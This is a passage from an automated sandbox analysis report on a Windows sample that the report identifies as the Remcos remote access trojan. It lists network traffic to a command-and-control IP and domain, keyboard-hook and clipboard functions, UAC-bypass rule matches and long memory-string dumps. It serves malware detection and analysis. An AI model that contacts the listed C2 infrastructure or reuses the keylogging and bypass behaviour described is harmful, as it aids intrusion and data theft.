          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_00407C97

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 23.94.53.100 2766Jump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 178.237.33.50 80Jump to behavior
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: yuahdgbceja.sytes.net
          Source: global trafficTCP traffic: 192.168.2.6:49707 -> 23.94.53.100:2766
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: ATOM86-ASATOM86NL ATOM86-ASATOM86NL
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,0_2_0018CE44
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficDNS traffic detected: DNS query: yuahdgbceja.sytes.net
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
          Source: deblaterate.exe, 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, deblaterate.exe, 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
          Source: svchost.exe, 0000000F.00000002.4490784851.0000000002E31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpD6
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
          Source: svchost.exe, 00000005.00000002.4072462611.0000000002C8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpal
          Source: svchost.exe, 00000005.00000002.4072031610.0000000002C31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpll
          Source: svchost.exe, 0000000F.00000002.4490748078.0000000002E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp~
          Source: Amcache.hve.9.drString found in binary or memory: http://upx.sf.net

          Key, Mouse, Clipboard, Microphone and Screen Capturing

          barindex
          Contains functionality to register a low level keyboard hook
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000005_2_0040A2B8
          Installs a global keyboard hook
          Source: C:\Windows\SysWOW64\svchost.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeWindows user hook set: 0 keyboard low level C:\Windows\SysWOW64\svchost.exeJump to behavior
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0018EAFF
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0018ED6A
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_004EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,4_2_004EED6A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,5_2_004168C1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,15_2_004168C1
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0018EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0018EAFF
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_0017AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_0017AA57
          Source: C:\Users\user\Desktop\GVV.exeCode function: 0_2_001A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_001A9576
          Source: C:\Users\user\AppData\Local\silvexes\deblaterate.exeCode function: 4_2_00509576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,4_2_00509576

          E-Banking Fraud

          barindex
          Yara detected Remcos RAT
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTR

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Contains functionalty to change the wallpaper
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0041C9E2 SystemParametersInfoW,5_2_0041C9E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 15_2_0041C9E2 SystemParametersInfoW,15_2_0041C9E2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 4.2.deblaterate.exe.4000000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 15.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 14.2.deblaterate.exe.3e00000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000004.00000002.3901211250.0000000004000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000000E.00000002.4105973198.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0000000F.00000002.4490357990.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000005.00000002.4071719764.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: Process Memory Space: deblaterate.exe PID: 5276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 2248, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: deblaterate.exe PID: 1136, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 592, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Binary is likely a compiled AutoIt script file
          Source: GVV.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: GVV.exe, 00000000.00000000.2038475493.00000000001D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_fcb6f643-2
          Source: GVV.exe, 00000000.00000000.2038475493.00000000001D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d3ec8fa3-3
          Source: GVV.exe, 00000000.00000003.3863279691.0000000003861000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_707dde75-c
          Source: GVV.exe, 00000000.00000003.3863279691.0000000003861000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_20f5db58-5
          Source: deblaterate.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: deblaterate.exe, 00000004.00000002.3900615657.0000000000532000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_9bf06364-3
          Source: deblaterate.exe, 00000004.00000002.3900615657.0000000000532000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_275a1e1a-8
          Source: deblaterate.exe, 0000000E.00000000.4081505385.0000000000532000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_22b7e7e6-5
          Source: deblaterate.exe, 0000000E.00000000.4081505385.0000000000532000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8df6bed2-6
          Source: GVV.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_48f4790b-8
          Source: GVV.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_c3aec12a-0
          Source: deblaterate.exe.0.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8e876750-1
          Source: deblaterate.exe.0.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating 